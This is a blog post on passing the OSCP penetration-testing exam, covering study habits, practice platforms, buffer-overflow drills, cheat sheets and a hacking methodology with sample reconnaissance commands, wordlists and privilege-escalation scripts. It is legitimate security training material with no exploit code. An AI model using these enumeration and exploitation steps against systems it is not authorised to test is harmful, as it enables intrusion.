⏎Avoiding Common OSCP Pitfalls🕳

Learn from painfully common mistakes that contributed to my initial failure and how to pass the Offensive Security Certified Professional exam. I went from a 35 point fail to a 100 point pass a few months later.

This post is written to help those on their ‘OSCP journey’, practicing hard on vulnerable machine platforms for their OSCP exam attempt. I want to improve your chances of passing by sharing my common mistakes, tips for successes, and how to practice most effectively. I’ve read hundreds of “OSCP journey” or “OSCP review” type posts like this one during my dive into the OSCP. I’m well aware of the common mistakes from first and second hand experience. This post is my accumulation all of that experience.

What you will learn from this post:

  • Best ethical hacking platform to practice for OSCP exam
  • Essentials tools to use every day during OSCP prep
  • Insights on lab report and hacking methodology

Initial Prep

The second month was spent in the PWK lab environment. Then I spent one more month doing TJnulls OSCP-like Hack the Box list, including doing some of the VulnHub boxes listed on there. I also completed Tib3rius Windows and Linux Privilege Escalation Udemy courses and The Cyber Mentor’s Pratical Ethical Hacking Udemy course. Ofcourse I took a great abundance of notes on the courses I took and the vulnerable machines hacked.

How to Fail

I cracked the buffer over flow and the 10 point machine the first couple of hours, then got stumped for the rest of the exam. I was able to find remote code execution on one machine but couldn’t get a shell on the target even after trying different shell spawning commands for hours.

Hints and Write-ups

Enumerate. Enumerate. Enumerate

Reading about OSCP, you will see this often. But what exactly does it mean?

Enumeration is finding the initial vulnerabilities on a target. It can also refer to finding vulnerabilities once you’ve accessed the target and are trying to escalate privileges. During PWK labs and Hack the Box labs, this process takes up majority of your time. I commonly went to discord servers and PWK forums to find hints to the PWK boxes. When doing Hack the Box it was even worse because I could look up write ups for retired machines with ease.

Getting dependent on hints and write-ups is a major problem, because your hacking methodology becomes something like this:

  1. Get stuck
  2. Get hint
  3. Pwn machine.

But when your taking the OSCP exam, step 2 in that methodology is not an option, so your process becomes this:

  1. Get stuck

That’s exactly what happened my first exam attempt.

Using walk-throughs and hints are absolutely necessary when you’re first learning to pwn your first dozen vulnerable machines or so. If you’re totally green and never attempted a vulnerable machine before, you’ll have no idea what to expect if you don’t read some walk-throughs and watch some YouTube videos about hacking vulnerable machines first.

However, when your months into your OSCP prep like I was, and you’re dependent on write-ups like I was for practice, you’re robbing yourself of learning one of the biggest skills that OSCP tests for: Self-Reliance. On the OSCP exam, you’re on your own, you have to enumerate, research, and hack on your own!

This may sound very obvious, but it’s an easy mistake to make because our brains errs towards being lazy to conserve energy. It simply takes less effort to hack a vulnerable machine using a walk-through, than struggling to hack a machine on your own. Though you’re learning much more doing the latter; don’t fall into the mistake of using hints and write ups too often.

A balance must be achieved between using hints and hacking on your own. If you’ve spent a few days stuck on a box you’re practicing on, then a hint is alright. But if it’s only been an hour or two, keep enumerating!

Understand rabbit holes.

Schedule carefully…

I picked 3PM thinking I could really sleep in and relax before the exam. Wrong. I could barely sleep the night before exam day from nerves. I woke up at 7AM on exam day. Couldn’t relax at all because was too anxious anticipating the exam. So for 8 hours, from 7AM to 3PM I was bugging out, waiting for the exam to start. I was mentally exhausted just from waiting to begin the exam.

I figured starting so late in a day at 3PM would allow me to keep my normal sleep scheduled, since I can go to bed at a reasonable time, rest up and still have plenty of time to since the exam would end 2:45PM the next day. Wrong. I couldn’t sleep at all while the exam was going. I got 2 hours of a feverish nap and then couldn’t function well for the rest of the exam.

Lesson Learned: Think hard about when exactly you’re going to start your exam. If you’re like me and can’t sleep when something important is going on, account for that.

How to Succeed

After about 24 hours from submitting the OSCP exam and lab report I got back the email saying I passed! So why did I succeed the second attempt?

Also a few months later I got this sweet certificate and card:

Proving Grounds

  1. Proving grounds is owned by Offensive Security(same folks running the OSCP Exam). They are hosting machines on Proving Grounds that’s the same flavor as the PWK labs and the machines I found on the exam, same type but not the same difficulty. PWK lab machines are much easier on average compared to exam machines, while Proving Grounds machines are slightly more difficult than the exam machines. The slight difficulty increase in the Proving Ground machines makes it perfect practice for OSCP exam. It’s the closest you can get to practicing on real exam machines, with even a few officially retired exam machines available.
  2. Less fluff than you’ll find in Hack the Box and PWK labs. By fluff, I mean things that aren’t tested for in OSCP exam currently. Things like pivoting, Active Directory, machines that have dependencies, or CTF-like crap that doesn’t help you learn enumeration or privilege escalation. Ironically, PWK labs has alot of pivoting and dependency machines that are essentially wasting your time doing things you don’t need to know for the exam.
  3. Write ups and hints are harder to come by. This is an important point as it pushes your more to hack machines on your own and not fall into the trap of over-relying on hints. Compared to hacking retired machines in Hack the Box, where finding answers for boxes is a google search away. Hack the Box write-ups was something my brain(me), wanting to be lazy, found hard to resist. In Proving Grounds, hints and write ups can actually be found on the website. However, it costs your precious points you gain when you hack machines without hints and write-ups. The points don’t really mean anything, but it’s a gamified way to disincentive using hints and write ups that worked really well on me.
  4. Proving Grounds is cheaper than buying a month of PWK labs.

If you can consistently crack intermediate difficulty machines and higher on Proving Grounds on your own. You should feel confident going into the OSCP exam.

How to pwn the Buffer Overflow no problem

Follow these 3 steps for a stress free 25 points on the OSCP exam.

  1. Understand the buffer over flow.

There are hundreds of great resources about learning a stack buffer overflow. If the OSCP textbook isn’t explaining it well enough for you, I recommend The Cyber Mentors videos on the topic:

2. Automate the buffer overflow.

There are quite a few scripts floating around Github that speed up the steps of the buffer overflow with a script like the one linked bellow. Gh0x0st’s script is the one I happened to use on the exam. Only start using this once you fully understand the “manual” way.

I should note that on the exam, I ran though the BOF machine in 25 minutes using the script bellow. But then did it the more “manual” way to document on the OSCP exam report. Just in case Offsec wanted to fail me on using an “automated” tool. Though I’ve read people passed using BOF scripts before, it’s your choice.

3. Master the buffer overflow.

Practice using Gh0x0st’s script, then created the buffer overflow proof of concept, then executing it for the reverse shell until you can get a 45 minute buffer overflow time, though you could easily get it down to 20–30 minutes. The Try Hack Me room linked bellow is the best practice you’ll get for the OSCP buffer overflow.

Follow these steps until you master the buffer overflow, and you shouldn’t stress about the BOF on the exam!

Make Cheat Sheets!

For example, here’s a part of my initial numeration cheat sheet documenting how to enumerate each port:

Here’s the outline for my OSCP buffer overflow cheat sheet which documents each step:

I’m not going to share exactly what I put on my cheat sheets because that will not help you! There are dozens of very impressive looking, publicly available, OSCP cheat sheets out there. I had many of them opened up on tabs all during my OSCP exam attempt. That was during the attempt I failed.

The attempt that I passed I had no cheat sheets up, not even my own! That’s because by creating your own cheat sheets, you review all the information you gathered while hacking vulnerable machines. You need to review all the notes you made previously to create effective cheat sheets. Reviewing those notes then documenting it again really helps with memorizing and understanding what is important while enumerating.

Time spent trying to study other peoples cheat sheets, is much much better spent creating your own cheat sheets.

Completing the lab report is not worth it.

I’m sure the folks at Offensive Security put a lot of work in the nearly 1000 page text book, but the exercises are loosely connected concepts that feel too abstract as you're working though them. Everything you learn in the exercises you can learn more effectively just by hacking vulnerable machines and watching ippsec. As you’re actually hacking vulnerable machines, you’re more effectively learning concepts you would in PWK exercises, rather than learning about the concepts in isolation.

You ought practice enough that you’re over-prepared. To the point you don’t need to stay up 23 hours to barely pass at 65 points + your lab report. Staying up a whole day and night, stressing out, trying to accomplish something you been preparing for months for. That’s no fun. Over prepare instead. I believe the exam is meant to be passed in under 12 hours. Offsec giving you 24 hours to complete the exam is just for the intimidation factor. Go to Proving Grounds, create cheat sheets, study like hell.

However, I understand the peace of mind that comes along with having extra 5 points on the exam. That’s what pushed me to complete all the exercises. Documenting 10 PWK lab machines is also good practice for when you’re going to write the exam report. If you’re planning on doing the exercises I made some checklists:

Exam Report

Hacking Methodology

The following is by no means an exhaustive list of things to do that will get you to hack every vulnerable machine, but it should give you an idea of how to structure your own hacking methodology as you develop it.

Initial Enumeration

ftp 10.10.10.10
showmount -e 10.10.10.10
smbclient -L 10.10.10.10

Hints, creds and other low hanging fruit are commonly put in these file shares.

If no information is found is open shares, start looking in websites. Browse to every strange port found by nmap scans in case it’s a website:

For every port hosting a website, run gobuster scans using the following wordlists. NmapAutomator does some of these scans for you already.

/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Search every website and sub directory for interesting services or files containing potential usernames and/or passwords. Test every search bar and user input for web application vulnerabilities: sql injection, command injection, LFI, RFI are most common. There are too many ways to attempt to exploit these vulnerabilities to summarize in a blog post. Use this website, it essentially tells you how to exploit every common web application vulnerability that’s common to OSCP-like machines:

Finding Exploits

For instance the service Microsoft IIS 6.0 pops up in an nmap scan:

Make it a reflex to google search like this:

There are certain websites you should particularly look out for in your exploit search that I found extremely useful.

Exploit-db

Exploit-db is also owned by Offensive Security. Any exploits you find on the exam, Offsec has to already know about, and have in their Exploit-db already… Therefor every exploit you’re going to need is on exploit-db? I can’t say for certain on this point, but it does make sense. Search with exploitdb:

Hacking Articles

This is an excellent blog about all things cybersecurity, and has a ton of information about vulnerable machine hacking that’s of interest to us. For certain privesc routes and Content Management Systems you’ll find in vulnerable machines, this blog has wonderful articles clearly explaining how to exploit them.

HackTricks

This website looks a lot like a cheatsheet, and I still stand by my advice that you should ignore cheathsheets and make your own. But it’s a cheatsheet that’s so expansive that the search bar is like a Google just for hacking vulnerable machines. There is so much information I’ve found that the initial enumeration or privesc route is contained already within this website 50% roughly of the time.

RCE to Shell

This is a topic that’s commonly looked over in discussions about OSCP practice, but it’s extremely important to know how to do, else you’re going to be stuck trying to learn it on the spot until the last sad hours of an exam attempt (yes I’m speaking from experience).

I made a whole other blog post on this topic:

Privilege Escalation

Weather you’re on a Windows or Linux target, what privesc vectors you’re enumerating for will be different. There are hundreds of different privesc exploits, document every exploit you come across during prep, in your notes, and separate by Windows and Linux. To give you an idea of how to structure your notes, here’s what my Linux(Left) and Windows(Right) notes look like on Joplin:

Just like with enumerating for initial exploits, this is where experience and hacking a lot of vulnerable machines has a big role. Knowing what to look for comes with experiencing and building your own hacking methodology. However, privesc scripts help out alot. For Windows, you should always run WinPEAS:

For Linux I use lse.sh:

These scripts will quickly print out a bunch of potential privesc vulnerabilities. For instance, it’ll highlight in big red characters if the version number on the machine is low, indicating a potential kernel vulnerability.

Be aware that these scripts will spit out plenty of false-positives so be careful you don’t go running down a rabbit hole because of a scripts output.

Essential Non-Hacky Tools

Joplin

Whenever I was hacking a vulnerable machine, I had Joplin open documenting everything I found and looking back on notes from previously hacked machines for reference. You need be taking taking notes with something. Joplin is the best because it can sync and search notes, has dark mode, VIM mode, and makes it really easy to paste in screenshots from clipboard all while being FOSS.

Flameshot

Flameshot makes taking screenshots and editing them every simple. Bind it to a key and it becomes a reflex while practicing to screenshot important terminal output and other items of interest while hacking vulnerable machines. Once it becomes a reflex, taking screenshots and pasting it into your Joplin notes makes documentation very fast.

Tmux

Tmux is great for organizing windows within a terminal. It can do much more than that, but that’s the extent of what you need it for in OSCP prep and exam. I usually used a 4 pane setup like above and switch between them while hacking a machine. I set up different Windows to compartmentalize each target during the exam. With a setup like this, switching between exam machines workflow is as simple as hitting three buttons:

Each orange number represents a different window for each target that can be switched to.

If you are to take away at least three things from this post:

  1. Take tons of notes
  2. Don’t over rely on hints and write-ups
  3. Use Proving Grounds

Happy hacking.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store